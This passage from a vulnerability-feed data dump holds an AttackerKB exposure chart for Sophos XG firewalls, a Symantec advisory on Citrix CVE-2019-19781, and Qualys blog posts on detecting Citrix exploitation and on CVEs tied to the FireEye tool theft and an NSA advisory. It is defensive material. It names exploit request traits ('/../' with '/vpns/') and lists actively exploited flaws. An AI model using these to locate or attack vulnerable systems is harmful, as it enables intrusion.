we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\nAssessed Attacker Value: 5 \n\n", "modified": "2021-03-29T00:00:00", "id": "AKB:75221F03-CFA1-478E-9777-568E523E3272", "href": "https://attackerkb.com/topics/CkJJPr77qk/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability", "published": "2020-04-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2019-12-19T16:22:11", "bulletinFamily": "software", "cvelist": ["CVE-2019-19781"], "description": "### Description\n\nMultiple Citrix Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Citrix NetScaler Gateway 10.5 \n * Citrix NetScaler Gateway 11.1 \n * Citrix NetScaler Gateway 12.0 \n * Citrix NetScaler Gateway 12.1 \n * Citrix NetScaler Gateway 13.0 \n * Citrix Netscaler Application Delivery Controller 10.5 \n * Citrix Netscaler Application Delivery Controller 11.1 \n * Citrix Netscaler Application Delivery Controller 12.0 \n * Citrix Netscaler Application Delivery Controller 12.1 \n * Citrix Netscaler Application Delivery Controller 13.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as non-executable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-17T00:00:00", "published": "2019-12-17T00:00:00", "id": "SMNTC-111238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111238", "type": "symantec", "title": "Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2020-01-20T12:15:15", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "**Update January 17, 2020**: A new detection in Qualys Web Application Scanning was added. See \"Detecting with Qualys WAS\" below.\n\nCitrix released a [security advisory](<https://support.citrix.com/article/CTX267027>) ([CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)) for a remote code execution vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system. Once exploited, remote attackers could obtain access to private network resources without requiring authentication.\n\nDuring the week of January 13, [attacks on Citrix appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) have [intensified](<https://www.zdnet.com/article/a-hacker-is-patching-citrix-servers-to-maintain-exclusive-access/>). Because of the active attacks and the ease of exploitation, organizations are advised to pay close attention.\n\n### About CVE-2019-19781\n\nThe vulnerability affects all supported versions of Citrix ADC and Citrix Gateway products. As Citrix did not disclose many details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) suggest the VPN handler fails to sufficiently sanitize user-supplied inputs. The exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\" and if user is connected to the SSLVPN, and sends a 403 response as seen below.\n\n_add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") &amp;&amp; (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403 _\n\n### Detecting with Qualys VM\n\nQualys has issued QID 372305 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that includes authenticated and remote detections of vulnerabilities present in affected Citrix products. This QID is included in signature version VULNSIGS-2.4.788-2.\n\n_QID 372305 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThe QID contains a remote and an authenticated signature to check the presence of vulnerability in Citrix Products. \nYou can search for this new QID in AssetView or within the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid:372305_ \n_vulnerabilities.vulnerability.cveId:`CVE-2019-19781`_\n\nThis will return a list of all impacted hosts.\n\nYou can also create a Dashboard to track all Citrix vulnerabilities as shown in the template below:\n\n\n\n \n\n### Detecting with Qualys Threat Protection\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the Impacted Assets number to see a list of hosts with this vulnerability.\n\n### Detecting with Qualys WAS\n\nQualys has released QID 150273 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that includes a passive detection of vulnerabilities present in the affected Citrix products.\n\n_QID 150273 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThis detection is useful for customers using Qualys WAS in their environments, and it has the advantage of detecting both at the root level of the target being scanned **and** at the starting URL of the web application as specified in the WAS configuration.\n\nThe passive detection works by sending an HTTPS request and looking for evidence of the vulnerability in the response. If the scanned application is vulnerable, the QID will be reported in your Qualys WAS scan report.\n\n### Mitigation\n\nCustomers are recommended to apply Citrix\u2019s [Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) as soon as possible.\n\nCustomers can check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nA patch is expected from Citrix by the end of January 2020, and organizations are advised to install that patch as soon as it is available.", "modified": "2020-01-09T00:12:26", "published": "2020-01-09T00:12:26", "id": "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781", "type": "qualysblog", "title": "Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T00:22:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation &amp; Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara &lt;path&gt;\u201d, where &lt;path&gt; is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs &amp; IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the &#x27;Domain controller: Allow vulnerable Netlogon secure channel connections&#x27; Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of &#x27;Responder&#x27; feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center &quot;Block macros from running in Office files from the Internet&quot; setting for a user profile \nCVE-2018-8581 | 20007 | Status of the &#x27;DisableLoopbackCheck&#x27; setting \nCVE-2019-0708 | 10404 | Status of the &#x27;Require user authentication for remote connections by using Network Level Authentication&#x27; setting \nCVE-2019-0708 | 7519 | Status of the &#x27;Allow users to connect remotely using Remote Desktop Services (Terminal Services)&#x27; setting \nCVE-2019-0708 | 1430 | Status of the &#x27;Terminal Services&#x27; service \nCVE-2019-0708 | 3932 | Status of the &#x27;Windows Firewall: Inbound connections (Public)&#x27; setting \nCVE-2019-0708 | 3948 | Status of the &#x27;Windows Firewall: Inbound connections (Private)&#x27; setting \nCVE-2019-0708 | 3949 | Status of the &#x27;Windows Firewall: Inbound connections (Domain)&#x27; setting \nCVE-2019-0708 | 3950 | Status of the &#x27;Windows Firewall: Firewall state (Public)&#x27; setting \nCVE-2019-0708 | 3951 | Status of the &#x27;Windows Firewall: Firewall state (Private)&#x27; setting \nCVE-2019-0708 | 3952 | Status of the &#x27;Windows Firewall: Firewall state (Domain)&#x27; setting \nCVE-2019-0708 | 11220 | List of &#x27;Inbound Rules&#x27; configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the &#x27;Do not allow folders in non-default stores to be set as folder home pages&#x27; setting \nCVE-2017-11774 | 20003 | Status of the &#x27;EnableRoamingFolderHomepages&#x27; registry setting \nCVE-2017-11774 | 20004 | Status of the &#x27;Do not allow Home Page URL to be set in folder Properties&#x27; Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on &quot;Setting&quot; icon in &quot;Dashboard&quot; section.\n * Select &quot;Import New Widget&quot; option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on &quot;Import&quot; button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "modified": "2020-12-10T00:48:29", "published": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n&quot;Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts,&quot; said the NSA advisory. It also recommended &quot;critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage.&quot;\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core &amp; Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for &quot;Active Attack&quot; RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This 